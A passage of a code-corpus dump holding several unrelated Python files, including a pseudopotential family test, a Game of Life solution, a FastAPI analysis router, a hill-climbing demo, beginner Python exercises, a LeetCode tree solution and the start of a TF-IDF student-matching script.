pytest.raises(TypeError):\n family.get_cutoffs(elements=None, structure='Ar')\n\n expected = parameters['Ar']\n assert family.get_cutoffs(elements='Ar') == (expected['cutoff_wfc'], expected['cutoff_rho'])\n assert family.get_cutoffs(elements=('Ar',)) == (expected['cutoff_wfc'], expected['cutoff_rho'])\n\n expected = parameters['He']\n assert family.get_cutoffs(elements=('Ar', 'He')) == (expected['cutoff_wfc'], expected['cutoff_rho'])\n\n expected = parameters['Ne']\n assert family.get_cutoffs(structure=structure) == (expected['cutoff_wfc'], expected['cutoff_rho'])\n\n # Try structure with multiple kinds with the same element\n expected = parameters['He']\n structure = create_structure(site_kind_names=['He1', 'He2'])\n assert family.get_cutoffs(structure=structure) == (expected['cutoff_wfc'], expected['cutoff_rho'])\n\n\ndef test_get_pseudos(clear_db, create_sssp_family, create_sssp_parameters, create_structure):\n \"\"\"Test the `SsspFamily.get_pseudos` method.\"\"\"\n family = create_sssp_family()\n\n with pytest.raises(TypeError):\n family.get_pseudos('Ar')\n\n expected = {\n 'Ar': family.get_pseudo('Ar'),\n 'He': family.get_pseudo('He'),\n 'Ne': family.get_pseudo('Ne'),\n }\n structure = create_structure(site_kind_names=['Ar', 'He', 'Ne'])\n assert family.get_pseudos(structure) == expected\n\n expected = {\n 'Ar1': family.get_pseudo('Ar'),\n 'Ar2': family.get_pseudo('Ar'),\n }\n structure = create_structure(site_kind_names=['Ar1', 'Ar2'])\n assert family.get_pseudos(structure) == expected\n","repo_name":"aiidateam/aiida-sssp","sub_path":"tests/groups/test_family.py","file_name":"test_family.py","file_ext":"py","file_size_in_byte":12222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3483083466","text":"\"\"\"\nThis problem was asked by Dropbox.\n\nConway's Game of Life takes place on an infinite\ntwo-dimensional board of square cells.\nEach cell is either dead or alive, and at each tick, the following rules apply:\n\nAny live cell with less than two live neighbours dies.\nAny live cell with two or three live neighbours remains living.\nAny live cell with more than three live neighbours dies.\nAny dead cell with exactly three live neighbours becomes a live cell.\nA cell neighbours another cell if it is horizontally,\nvertically, or diagonally adjacent.\n\nImplement Conway's Game of Life.\nIt should be able to be initialized with a starting list of live\ncell coordinates and the number of steps it should run for.\nOnce initialized, it should print out the board state at each step.\nSince it's an infinite board, print out only the relevant coordinates,\ni.e. from the top-leftmost live cell to bottom-rightmost live cell.\n\nYou can represent a live cell with an asterisk (*)\nand a dead cell with a dot (.).\n\"\"\"\nimport unittest\nfrom operator import itemgetter\nfrom random import choice\nfrom typing import List, Tuple\n\n\ndef create_board(living: List[Tuple[int, int]]) -> List[List[str]]:\n min_r = min(living, key=itemgetter(0))[0]\n max_r = max(living, key=itemgetter(0))[0]\n rows = max_r - min_r + 1\n min_c = min(living, key=itemgetter(1))[1]\n max_c = max(living, key=itemgetter(1))[1]\n cols = max_c - min_c + 1\n board = [['.'] * cols for _ in range(rows)]\n for cell in living:\n x = cell[0] - min_r\n y = cell[1] - min_c\n board[x][y] = '*'\n return board\n\n\ndef print_board(board: List[List[str]]) -> None:\n for row in board:\n print(''.join(row))\n\n\ndef count_neighbours(board: List[List[str]], x: int, y: int) -> int:\n height = len(board)\n width = len(board[0])\n living_neighbours = 0\n\n # check for living left of cell\n if y > 0 and board[x][y-1] == '*':\n living_neighbours += 1\n\n # check for living top-left of cell\n if x > 0 and y > 0 and board[x-1][y-1] == '*':\n living_neighbours += 1\n\n # check for living top-right of cell\n if x > 0 and y < width - 1 and board[x-1][y+1] == '*':\n living_neighbours += 1\n\n # check for living bottom-left of cell\n if x < height - 1 and y > 0 and board[x+1][y-1] == '*':\n living_neighbours += 1\n\n # check for living bottom-right of cell\n if x < height - 1 and y < width - 1 and board[x+1][y+1] == '*':\n living_neighbours += 1\n\n # check for living above cell\n if x > 0 and board[x-1][y] == '*':\n living_neighbours += 1\n\n # check for living below cell\n if x < height - 1 and board[x+1][y] == '*':\n living_neighbours += 1\n\n # check for living right of cell\n if y < width - 1 and board[x][y+1] == '*':\n living_neighbours += 1\n return living_neighbours\n\n\ndef update_board(board: List[List[str]]) -> None:\n for ix, row in enumerate(board):\n for ij in range(len(row)):\n neighbours = count_neighbours(board, ix, ij)\n if neighbours == 3:\n board[ix][ij] = '*'\n elif neighbours == 2 and board[ix][ij] == '*':\n continue\n else:\n board[ix][ij] = '.'\n\n\ndef game_of_life(living: List[Tuple[int, int]], steps: int) -> None:\n board = create_board(living)\n print('Initial boardstate:')\n print_board(board)\n print('\\n')\n for i in range(1, steps + 1):\n update_board(board)\n print(f'Iteration {i} boardstate:')\n print_board(board)\n print('\\n')\n\n\nclass TestSolution(unittest.TestCase):\n def test_count_neighbours_none(self) -> None:\n self.assertEqual(count_neighbours([\n ['.', '.', '.']\n ], 0, 1), 0)\n self.assertEqual(count_neighbours([\n ['.'],\n ['.'],\n ['.']\n ], 1, 0), 0)\n\n def test_count_neighbours_top(self) -> None:\n self.assertEqual(count_neighbours([\n ['.', '*', '.'],\n ['.', '.', '.'],\n ['.', '.', '.']\n ], 1, 1), 1)\n\n def test_count_neighbours_top_right(self) -> None:\n self.assertEqual(count_neighbours([\n ['.', '.', '*'],\n ['.', '.', '.'],\n ['.', '.', '.']\n ], 1, 1), 1)\n\n def test_count_neighbours_top_left(self) -> None:\n self.assertEqual(count_neighbours([\n ['*', '.', '.'],\n ['.', '.', '.'],\n ['.', '.', '.']\n ], 1, 1), 1)\n\n def test_count_neighbours_left(self) -> None:\n self.assertEqual(count_neighbours([\n ['.', '.', '.'],\n ['*', '.', '.'],\n ['.', '.', '.']\n ], 1, 1), 1)\n\n def test_count_neighbours_right(self) -> None:\n self.assertEqual(count_neighbours([\n ['.', '.', '.'],\n ['.', '.', '*'],\n ['.', '.', '.']\n ], 1, 1), 1)\n\n def test_count_neighbours_bottom(self) -> None:\n self.assertEqual(count_neighbours([\n ['.', '.', '.'],\n ['.', '.', '.'],\n ['.', '*', '.']\n ], 1, 1), 1)\n\n def test_count_neighbours_bottom_right(self) -> None:\n self.assertEqual(count_neighbours([\n ['.', '.', '.'],\n ['.', '.', '.'],\n ['.', '.', '*']\n ], 1, 1), 1)\n\n def test_count_neighbours_bottom_left(self) -> None:\n self.assertEqual(count_neighbours([\n ['.', '.', '.'],\n ['.', '.', '.'],\n ['*', '.', '.']\n ], 1, 1), 1)\n\n def test_create_board(self) -> None:\n self.assertEqual(create_board([(1, 0), (3, 1)]), [\n ['*', '.'],\n ['.', '.'],\n ['.', '*']\n ])\n\n def test_game_of_life(self) -> None:\n # output is not checked, only if runs without failure\n members = 300\n x_options = range(25)\n y_options = range(50)\n iters = 10\n game_of_life([\n (choice(x_options) + 3, choice(y_options) + 20)\n for _ in range(members)\n ], iters)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Nr90/daily_coding_problem","sub_path":"p39/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28581692754","text":"from fastapi import APIRouter, HTTPException, Depends\nfrom fastapi_utils.tasks import repeat_every\nfrom fastapi.responses import JSONResponse\n\nfrom ..database.models.http_responses import *\nfrom ..routers.authentication import User, authenticate\nfrom ..database.analysis import update\n\n\nrouter = APIRouter(\n tags=[\"analysis\"]\n)\n\n\n# <------------------------>\n# API-Analysis\n# <------------------------>\n\n@router.get(\"/update\", responses=default_responses)\nasync def analysis(user: User = Depends(authenticate)):\n if user[\"access_lvl\"] != 0 and user[\"access_lvl\"] != 1:\n raise HTTPException(status_code=403, detail=\"Insufficient authorization level!\")\n\n print(\"updating...\")\n update()\n print(\"updated!\")\n\n return JSONResponse(status_code=200, content={\"acknowledged\": True})\n\n@router.on_event(\"startup\")\n@repeat_every( seconds= 60 * 60 * 24 )\nasync def __analysis():\n print(\"updating...\")\n update()\n print(\"updated!\")\n","repo_name":"TILT-RiskOfDataBreach/backend","sub_path":"analysis/app/routers/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6065647621","text":"#! usr/bin/env python3\n\nimport random\n\n\"\"\"\n2.4\n\nStochastic Hill Climbing iterates the process of randomly\nselecting a neighbor for a candidate solution and only accept\nit if it results in an improvement. The strategy was proposed to\naddress the limitations of deterministic hill climbing techniques\nthat were likely to get stuck in local optima due to their greedy\nacceptance of neighboring moves.\n\nThis code implements the Random Mutation Hill Climbing algorithm,\na specific instance of Stochastic Hill Climbing. It is applied to\na binary string optimization problem called \"One Max\": prepare a\nstring of all '1' bits where the cost function only reports the\nnumber of bits in a given string.\n\nImplementation notes:\nThe reference implementation uses a list of (one-character) strings.\nI opted to use a String object directly.\n\n@author Chad Estioco\n\"\"\"\n\ndef onemax(vector):\n\tlimit = len(vector)\n\tone_count = 0\n\t\n\tfor i in range(limit):\n\t\tif vector[i] == \"1\":\n\t\t\tone_count += 1\n\t\n\treturn one_count\n\ndef random_bitstring(num_bits):\n\tdef generator():\n\t\tbit = None\n\t\t\n\t\tif random.random() < 0.5:\n\t\t\tbit = \"1\"\n\t\telse:\n\t\t\tbit = \"0\"\n\t\t\n\t\treturn bit\n\t\n\treturn \"\".join(generator() for i in range(num_bits))\n\ndef random_neighbor(bitstring):\n\tmutant = bitstring\n\tlimit = len(bitstring)\n\tpos = random.randint(0, limit - 1)\n\t\n\tif mutant[pos] == \"1\":\n\t\tmutant = \"\".join((mutant[0:pos], \"0\" ,mutant[pos + 1:limit]))\n\telse:\n\t\tmutant = \"\".join((mutant[0:pos], \"1\" ,mutant[pos + 1:limit]))\n\t\n\treturn mutant\n\ndef search(max_iterations, num_bits):\n\tcandidate = {}\n\tcandidate[\"vector\"] = random_bitstring(num_bits)\n\tcandidate[\"cost\"] = onemax(candidate[\"vector\"])\n\t\n\tfor i in range(max_iterations):\n\t\tneighbor = {}\n\t\tneighbor[\"vector\"] = random_neighbor(candidate[\"vector\"])\n\t\tneighbor[\"cost\"] = onemax(neighbor[\"vector\"])\n\t\t\n\t\tif neighbor[\"cost\"] >= candidate[\"cost\"]:\n\t\t\tcandidate = neighbor\n\t\t\n\t\tprint(\"Iteration \" + str(i) + \": best = \" + str(candidate[\"cost\"]))\n\t\t\n\t\tif candidate[\"cost\"] == num_bits:\n\t\t\tbreak\n\t\n\treturn candidate\n\nif __name__ == \"__main__\":\n\t# problem configuration\n\tnum_bits = 64\n\t\n\t# algorithm configuration\n\tmax_iterations = 1000\n\t\n\t# execute the algoirthm\n\tbest = search(max_iterations, num_bits)\n\tprint(\"Done. Best Solution: cost = \" + str(best[\"cost\"]) + \", v = \" + str(best[\"vector\"]))\n","repo_name":"mostafaashraf413/CleverAlgorithms-Python","sub_path":"python/stochastic/stochastic_hill_climbing.py","file_name":"stochastic_hill_climbing.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"72737798595","text":"'''\nSome toy problems to practice python. These are not the most 'pythonic' \nways to solve these problems, but they are simple ways, which are very \nbasic-syntax-heavy. The purpose of these problems is to practice using\nbasic python syntax, and to start thinking in a cody-y sort of way (for \nthose for whom this is their first coding language)\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nfrom collections import defaultdict\nimport re\nimport random\nfrom scipy import integrate\nimport argparse\n\n### 1 ###\ndef factorial(x):\n '''\n A function to compute factorial(x),\n where x is an intiger.\n That is, fact(x) = 1*2*3*4*...*x\n\n Returns an int.\n '''\n i = 1\n y = x\n\n while i < y:\n x *= i\n i += 1\n\n return x\n\n### 2 ###\ndef modulus(x, modu):\n '''\n Computes x mod modu.\n\n Returns a float or an int.\n '''\n signx = x/abs(x)\n signmod = modu/abs(modu)\n\n y = abs(x)\n moduy = abs(modu)\n\n while y > moduy:\n y -= moduy\n\n if signx < 0.:\n if signmod > 0.:\n return signx*y+modu\n else:\n return -y\n\n else:\n if signmod < 0.:\n return signx*y+modu\n else:\n return y\n\n### 3 ###\ndef list_of_lists(l, m):\n '''\n Makes a list of lists.\n\n Returns a nested list.\n '''\n abet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n 'q', 'r', 's', 't', 'u', 'v', 'w', 'x',\n 'y', 'z']\n lst = [[abet[mm] for ll in xrange(l)] for mm in xrange(m)]\n return lst\n\n### 4 ###\ndef lists_of_list(l, m):\n '''\n Makes lists of a list.\n\n Returns a nested list.\n '''\n abet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n 'q', 'r', 's', 't', 'u', 'v', 'w', 'x',\n 'y', 'z']\n lst = [[abet[ll] for ll in xrange(l)] for mm in xrange(m)]\n return lst\n\n### 5 ###\ndef tup_to_list(list_of_tups):\n '''\n Takes a list of tuples, and returns a\n list of lists, with the first list containing\n the first entry in the tuples, the\n second list containing the second\n entry in the tuples.\n\n Returns a list of lists.\n '''\n for tup in list_of_tups:\n lst1.append(tup[0])\n lst2.append(tup[1])\n return lst1, lst2\n\n### 6 ###\ndef tuple_to_dict(data):\n '''\n Takes a list of tuples, and returns a\n dictionary with 'key' that first entry in\n tuples, and entry a list of the sencond\n entry in tuples with first entry key.\n\n Returns a dictionary.\n '''\n dict_tup = {}\n for tup in data:\n try:\n dict_tup[tup[0]].append(tup[1])\n except KeyError:\n dict_tup[tup[0]] = [tup[1]]\n return dict_tup\n\n### 7 ###\ndef sort_tups(data):\n '''\n Takes a list of tuples, and returns a\n list of the same tups, sorted by the first\n tuple entry.\n\n Returns a list of tupless.\n '''\n sorted_tup = sorted(data, key=lambda tup: tup)\n\n return sorted_tup\n\n### 8 ###\ndef remove_empty_tuples(tup_list):\n '''\n Removes empty tuples from a list of tuples.\n\n Returns a list of tuples.\n '''\n tple = [tpl for tpl in tup_list if tpl]\n return tple\n\n### 9 ###\ndef sum_arr(x0, x1, xi=1.0):\n '''\n A function to sum from x0, with x1 steps of size\n xi, keeping the result for each succesive step.\n default is xi = 1\n\n Returns a numpy array.\n '''\n step = x0\n nsteps = x1\n output = np.zeros(nsteps+1)\n count = 0\n output[0] = step\n while count < x1:\n count += 1\n step += xi\n output[count] = step\n return output\n\n### 10 ###\ndef plot_x_pow_n(xmin, xmax, n, numpts=100):\n '''\n Plots x vs x^2 and displays it.\n\n Returns nothing.\n '''\n x = np.linspace(xmin, xmax, numpts)\n plt.close()\n\n # Basic plot\n plt.plot(x, x**n)\n # With some tweaking and stuff. There's so mauch you can customize...\n plt.plot(x, x**n, color = 'm', linewidth = 8, linestyle = ':', dashes = (30,10) )\n\n plt.axes().set_xlabel(\"here's an xlabel\")\n plt.axes().set_ylabel('and a ylabel')\n plt.savefig('plot_eg.png')\n\n### 11 ###\ndef fourxfour_plot(xmin, xmax, numpts=100):\n '''\n Plots a 4x4 set of axes, showing\n x^1, x^2, x^3, and x^4 respectively.\n\n Returns nothing.\n '''\n x = np.linspace(xmin, xmax, numpts)\n plt.close()\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)\n\n # Basic plot\n ax1.plot(x, x**1)\n ax2.plot(x, x**2)\n ax3.plot(x, x**3)\n ax4.plot(x, x**4)\n \n fig.tight_layout()\n fig.savefig('fxf_plot_eg.png')\n\n### 12 ###\ndef scatterplot_random(xmin, xmax, numpts=100):\n '''\n Produces a scatterplot of random points\n in the range [xmin,xmax]\n\n Returns nothing.\n '''\n numpts = xrange(numpts)\n x = [random.randrange(xmin, xmax, 1.) for n in numpts]\n y = [random.randrange(xmin, xmax, 1.) for n in numpts]\n \n plt.close()\n plt.scatter(x,y, 30, color = 'r')\n plt.savefig('scatter_eg.png')\n\n### 13 ###\ndef twodim_xsq_ysq(xmin, xmax, numpix=100):\n '''\n Produces a two-dimensional image\n (as opposed to scatter plot)\n of x^2 + y^2 in the range [xmin,xmax]\n\n Note that when using matplotlib.pyplot.imshow()\n you should always add the arguments \n interpolation='nearest' and origin='lower'. \n\n For some reason imshow by default smooths your image,\n and setting interpolation='nearest' turns this off \n so the true pixels are shown. \n The second argument is to set the origin of the image\n to the lower left hand corner of the image. For some \n reason this is not the default!\n\n Returns nothing.\n '''\n \n x = np.linspace(0, numpix-1, numpix)\n y = np.linspace(0, numpix-1, numpix)\n \n xgrid, ygrid = np.meshgrid(x,y)\n\n plt.close()\n plt.imshow(xgrid**2+ygrid**2, interpolation='nearest', origin='lower')\n plt.savefig('imshow_eg.png')\n\n### 14 ###\ndef read_data(filename, ncols, delimiter = ','):\n '''\n Reads data from a .csv file and\n returns each column in a list,\n witout using the csv module.\n\n 'U' means universal, and allows for newline charachters\n from any operating system. E.g. Excel on OSX will use\n funky newlines that otherwise woudl cause issues.\n The alternative is to use 'r+', which means regular read\n with extra permissions\n Go to section 7.2 here:\n https://docs.python.org/2/tutorial/inputoutput.html\n for more on differnt read/write instructions for\n python.\n\n Returns an array containing the data.\n '''\n with open(filename, 'U') as csvfile:\n result = [[] for n in xrange(ncols)]\n for row in csvfile:\n cols = row.strip('\\n').split(delimiter)\n for i,col in enumerate(cols):\n result[i].append(col)\n return np.array(result)\n\n### 14 *alternative* ###\ndef read_csv(filename, ncols, delimiter = ','):\n '''\n Reads data from a .csv file and\n returns each column in a list,\n using the csv module.\n The csv module handles data containing\n quote charachters better than simple row\n reading as in read_data. The alternative is\n to force the data to be read as a regular\n expression by using the regex module.\n Google this to learn more.\n\n 'U' means universal, and allows for newline charachters\n from any operating system. E.g. Excel on OSX will use\n funky newlines that otherwise woudl cause issues.\n The alternative is to use 'r+', which means regular read\n with extra permissions\n Go to section 7.2 here:\n https://docs.python.org/2/tutorial/inputoutput.html\n for more on differnt read/write instructions for\n python.\n\n Returns an array containing the data.\n '''\n with open(filename, 'U') as csvfile:\n reader = csv.reader(csvfile,\n delimiter=delimiter,\n quotechar='\"')\n result = [[] for n in xrange(ncols)]\n for row in reader:\n for i,col in enumerate(row):\n result[i].append(col)\n return np.array(result)\n\n### 15 ###\ndef write_data(data, savename, delimiter=','):\n '''\n writes the data to file called\n savename, with fields separated by\n the delimiter.\n 'data' must be row by column\n Returns nothing.\n '''\n with open(savename,'w+') as f:\n for row in data:\n row = [str(r) for r in row] # make sure they're strings\n f.write(delimiter.join(row)+'\\n')\n\n### 16 ###\ndef join_csvs(filenames, ncols, join_ons, delimiters=None, savename='joined_data.csv', header=None):\n '''\n Takes a list of csv files and joins them on a given common column.\n Assumes there is no missing data in the files.\n You need to specify the coumn in each csv which is common with the\n other csv files, that is to be joined on.\n You also need to specify how many columns each csv has.\n Writes the joined data to savename, with the joining column first.\n If a header is specified for the joining column this is put at the\n top of the output file.\n\n Returns nothing.\n '''\n if delimiters==None:\n # Assume commas sep vals if no delimiter is specified\n delimiters = [',' for f in filenames]\n\n # This forces each data to be a numpy array cos we assume it is later on\n datas = [np.array(read_csv(f, nc, delimiter=d)) \\\n for f,nc,d in zip(filenames,ncols,delimiters)]\n\n dicts = [{} for d in datas]\n\n for data, join_on, a_dict in zip(datas, join_ons, dicts):\n # data is assumed to be an array\n data = data.T # change from col by row to row by col\n for row in data:\n # when you add lists they join together, \n # when you add arrays they must be the same shape and \n # you add the values of the elements, elementwise\n # Hence we make these lists so we can avoid the row \n # we join on\n a_dict[row[join_on]]=list(row[:join_on])+list(row[join_on+1:]) \n\n # A defaultdict will automatically produce an entry for \n # any key that doesn't yet exist. \n # A regular dict like {} doesn't do this. \n dd = defaultdict(list)\n # Join the dictionaries on the selected columns\n for d in dicts:\n for key, values in d.iteritems():\n for value in values:\n dd[key].append(value)\n\n # Put the joined info back into an array and write to file\n data = []\n # Ensure the header is the first thing written to file\n if header:\n data.append([header]+dd[header])\n for key, values in dd.iteritems():\n if key==header:\n continue # We already have it at the top of the data\n data.append([key]+values)\n data = np.array(data)\n write_data(data, savename, delimiter=',')\n\n### 17 ###\ndef hist_plot(filename, savename, ncol, histcol, delimiter=',', header=False):\n '''\n Plots a histogram of a column from a datafile\n specified by filename. The column does NOT need to be\n numerical. If you're just trying to histogram numerical\n data you should use numpy.histogram()\n You need to specify the savename to save the plot to,\n the number of columns in the file, as well\n as the column to histogram need to be specified.\n Differet delimiters can also be optioanlly specified.\n Assumes there is no header. If there is, set header=True\n and the first row will be skipped.\n\n Returns nothing.\n '''\n data = np.array(read_csv(filename, ncol, delimiter=delimiter))\n data_to_hist = data[histcol]\n # for line in set(data_to_hist):\n # print line\n if header:\n data_to_hist = data_to_hist[1:]\n\n # A defaultdict will automatically produce an entry for \n # any key that doesn't yet exist. \n # A regular dict like {} doesn't do this. \n datadict = defaultdict(int)\n for dat in data_to_hist:\n # Every time an item is found, add 1 to its entry\n datadict[dat] += 1\n\n # Split up the keys and data in the dictionary\n # into two tuples\n item, number = zip(*datadict.items())\n # Make a set of indices for the data bins (the keys)\n index, item = zip(*enumerate(item))\n\n plt.clf()\n # Plot the number of each item against the item index\n plt.bar(index, number, width = 1.)\n # Shift the ticks so they sit in the middle of the bins\n plt.axes().set_xticks([ind+0.5 for ind in index])\n # Label the bins wth the items (as opposed to the indices)\n plt.axes().set_xticklabels(item, rotation = 20, fontsize = 30)\n plt.savefig(savename)\n\n### 18 ###\ndef count_instances_simple(filename, searchterm, ncol, thiscol = None, delimiter=',', header=False):\n '''\n Counts the number of instances of a string or\n number in a file, either from one column in the\n file, or from the whole file.\n\n Returns the number of whole word/whole number\n instances, the number of instances including\n within words/numbers, a list of locations\n giving the column and row number of each\n occurrence of the the word/number for the\n whole word/number search, and the same for\n the sub-word/number search.\n '''\n data = np.array(read_csv(filename, ncol, delimiter=delimiter))\n\n if header:\n data = data[:,1:]\n if thiscol != None:\n data = data[thiscol]\n\n n_instances_whole = 0\n n_instances_all = 0\n \n loc_whole = []\n loc_all = []\n for i, col in enumerate(data):\n for j, row in enumerate(col):\n\n # Whole word\n st = str(searchterm).upper()\n srow = str(row).upper()\n \n re_search_whole = r'\\b'\n re_search_whole += '('+st+')'\n re_search_whole += r'\\b'\n instances_whole = re.findall(re_search_whole, srow)\n \n re_search_all = r''\n re_search_all += '('+st+')'\n instances_all = re.findall(re_search_all, srow)\n\n n_instances_whole +=len(instances_whole)\n n_instances_all +=len(instances_all)\n\n # Python sees an empy list as a boolean False, \n # and any other list as a boolean True, \n # So the below line is the same as saying \n # if len(instances)>0. \n if n_instances_whole:\n loc_whole.append( (i, j) )\n if n_instances_all:\n loc_all.append( (i, j) )\n\n\n return n_instances_whole, n_instances_all, loc_whole, loc_all\n\n### 19 ###\ndef integrate_invexp(a, b):\n '''\n Integrate the function a*e^(-b*x) from\n 0 to infinity. \n\n Returns the result of the integral.\n '''\n\n def invexp(x, a, b):\n return a * np.exp(- b * x)\n\n res, err = integrate.quad(invexp, 0, np.inf, args = (a, b))\n\n return res\n\n### 20 ###\ndef parse_arguments():\n '''\n Parse the command line \n arguments of a program.\n\n Returns an argument parser object.\n '''\n \n DEFAULT_ARG_VALUE = 'this_is_the_default_value'\n\n parser = argparse.ArgumentParser(description='Example parser')\n \n parser.add_argument(\n '--first_arg', # The name of the input variable\n required=True, # Is it an optional variable?\n metavar='THE_FIRST_ARG', # For errormessage printing purposes\n type=float, # The datatype of the input variable\n # A description of the variable or error message purposes\n help='the first argument in this test code is a float'\n )\n\n parser.add_argument(\n '--second_arg',\n required=False,\n metavar='THE_SECOND_ARG',\n type=str,\n help='the second argument in this test code is a string',\n default=DEFAULT_ARG_VALUE\n )\n\n return parser.parse_args()\n\ndef main():\n '''\n This is a special function name.\n Everything in your code should\n run inside main()\n '''\n\n ### 1 ###\n # fact = factorial(10)\n # print 'factorial', fact\n\n ### 2 ###\n # x_mod_z = modulus(100, 12)\n # print 'x_mod_z', x_mod_z\n\n ### 3 ###\n # lst2 = list_of_lists(5, 3)\n # print 'list', lst2\n\n ### 4 ###\n # lst = lists_of_list(5, 3)\n # print 'list', lst\n\n ### 5 ###\n # list1, list2 = tup_to_list([('f', 3), ('e', 9), ('j', 5), ('d', 1), ('g', 2)])\n # print list1, list2\n\n ### 6 ###\n # dict_tup = tuple_to_dict([('f', 3), ('e', 9), ('j', 5), ('d', 1), ('g', 2),\n # ('g', 3), ('g', 12), ('i', 2), ('e', 2)])\n # print 'dict_tup', dict_tup\n\n ### 7 ###\n # sorted_tup = sort_tups([('f', 3), ('e', 9), ('j', 5), ('d', 1), ('g', 2),\n # ('g', 3), ('g', 12), ('i', 2), ('e', 2)])\n # print 'sorted_tup', sorted_tup\n\n ### 8 ###\n # tpl = remove_empty_tuples([('f', 3), ('e', 9), ('j', 5), (), ('d', 1), ('g', 2)])\n # print 'tuple', tpl\n\n ### 9 ###\n # sumtest_arr = sum_arr(5, 10, xi=1.5)\n # print 'sumtest_arr', sumtest_arr\n\n ### 10 ###\n # plot_x_pow_n(0.,100., 3)\n\n ### 11 ###\n # fourxfour_plot(-100, 100, numpts=100)\n\n ### 12 ###\n # scatterplot_random(-50., 50., numpts=100)\n\n ### 13 ###\n # twodim_xsq_ysq(-50., 50., numpix=100)\n\n ### 14 ###\n # data1 = read_data('FL_insurance_sample.csv', 18, delimiter = ',')\n # data1 = read_data('gamma_true_gamma_obs.txt', 4, delimiter = ' ')\n # for datrow in data1.T:\n # print datrow\n\n ### 14 *alternative* ###\n # data2 = read_csv('FL_insurance_sample.csv', 18, delimiter = ',')\n # data2 = read_csv('gamma_true_gamma_obs.txt', 4, delimiter = ' ')\n # print data1.shape, data2.shape\n # for datrow in data2:\n # print datrow\n\n ### 15 ###\n # write_data(data1.T, 'test.csv', delimiter=',')\n\n ### 16 ###\n # join_csvs(['data1.csv', 'data2.csv'], [4,3], [0,0], header='id')\n\n ### 17 ###\n # hist_plot('FL_insurance_sample.csv', 'itemhist.png', 18, 16, delimiter=',', header=True)\n\n ### 18 ###\n # n_instances_whole, n_instances_all, loc_whole, loc_all = \\\n # count_instances_simple('FL_insurance_sample.csv', 'Coun', 18, delimiter=',', header=True)\n # print n_instances_whole, n_instances_all\n # print loc_whole, loc_all\n\n ### 19 ###\n # result = integrate_invexp(2., 1.)\n # print result\n\n ### 20 ###\n # arguments = parse_arguments()\n # print arguments.first_arg, arguments.second_arg\n\n# This tells python to run the main() function by defualt\nif __name__ == '__main__':\n main()\n","repo_name":"bjpop/cosmology_example","sub_path":"toy_problems.py","file_name":"toy_problems.py","file_ext":"py","file_size_in_byte":18329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2040643598","text":"#\n# @lc app=leetcode id=235 lang=python3\n#\n# [235] Lowest Common Ancestor of a Binary Search Tree\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n\n p_val = min(p.val, q.val)\n q_val = max(p.val, q.val)\n\n self.minimum = root.val\n\n def search(node):\n\n if p_val <= node.val <= q_val:\n return node\n\n elif q_val < node.val:\n return search(node.left)\n \n else:\n return search(node.right)\n \n res = search(root)\n return res\n \n\n\n \n \n# @lc code=end\n\n","repo_name":"aryanjain28/DSA","sub_path":"revision_150/235.lowest-common-ancestor-of-a-binary-search-tree.py","file_name":"235.lowest-common-ancestor-of-a-binary-search-tree.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37197722403","text":"# Import Pandas\nimport pandas as pd\n\n# Import TfIdfVectorizer from scikit-learn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# Import linear_kernel\nfrom sklearn.metrics.pairwise import linear_kernel\n\nimport clean_info as ci \nimport model_selection as ms \nimport speed_up_ms as sums\n\n# Define a TF-IDF Vectorizer Object. Remove all english stop words such as 'the', 'a'\ntfidf = TfidfVectorizer(token_pattern=u'(?ui)\\\\b\\\\w*[a-z]+\\\\w*\\\\b', stop_words='english', use_idf = True)\n# tfidf = TfidfVectorizer(token_pattern=u'(?ui)\\\\b\\\\w*[a-z]+\\\\w*\\\\b', stop_words='english', use_idf = False)\n\nprimary = 'Name'\n# groupby = 'Race'\ngroupby = None\nuse_model = False \nspeed_model = False \n\n# data of people to be paired\n# csv = 'Prof Clarkson Test Data - Sheet1 (1).csv'\ncsv = '2110Data.csv'\n\n# round one variables\nnum = 2\nrand_num = 4\ndo_random = False \n\n# round two variables\npair_groups = True \nnum2 = 2\nrand_num2 = 3\ndo_random2 = True \n\n# features\n# features = ['Name', 'Major','Class 1','Class 2','Class 3','Class 4','Interest 1','Interest 2','Interest 3','Hometown','Hometype']\n# weights = {'Name': 0, 'Major': 30, 'Class 1': 20, 'Class 2': 20, 'Class 3': 20, 'Class 4': 20, 'Interest 1': 12, 'Interest 2': 12, 'Interest 3': 12, 'Hometown': 18, 'Hometype': 0}\ni_classes = ['Course1','Course2','Course3','Course4']\ninterests = ['Interest1','Interest2']\nfeatures = ['Name','Gender','Major','GradYear'] + i_classes + interests + ['StudyHabits','Hometown','CampusLocation','Race','Pref']\n# features = ['Name','Major','Grad Year'] + i_classes + interests + ['Hometown']\nreplace_space = i_classes + ['Major', 'Hometown','StudyHabits','CampusLocation']\n# replace_space = i_classes + ['Major', 'Hometown']\nreplace_list = interests\ncombine = {'Classes 1': i_classes, 'Interests': interests}\nc_weight = 16\ni_weight = 8\nweights = {'Name': 0, 'Gender': 0, 'Major': 5, 'GradYear': 7, \n 'Interest 1': i_weight, 